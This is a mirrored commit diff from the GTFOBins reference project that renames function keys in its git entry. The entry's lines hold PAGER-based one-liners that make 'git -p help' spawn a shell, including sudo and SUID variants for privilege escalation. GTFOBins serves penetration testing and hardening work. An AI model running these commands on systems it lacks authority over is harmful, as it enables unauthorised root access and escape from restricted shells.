mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-09-21 15:49:28 +02:00
Adopt new function names
This commit is contained in:
@@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: PAGER='sh -c "exec sh 0<&1"' git -p help
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
|
||||
---
|
||||
|
Reference in New Issue
Block a user